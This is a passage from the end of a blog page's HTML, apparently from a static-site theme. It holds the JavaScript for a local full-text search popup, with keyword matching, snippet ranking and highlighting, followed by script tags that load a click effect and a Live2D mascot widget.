                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  
  

  

  

  

  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>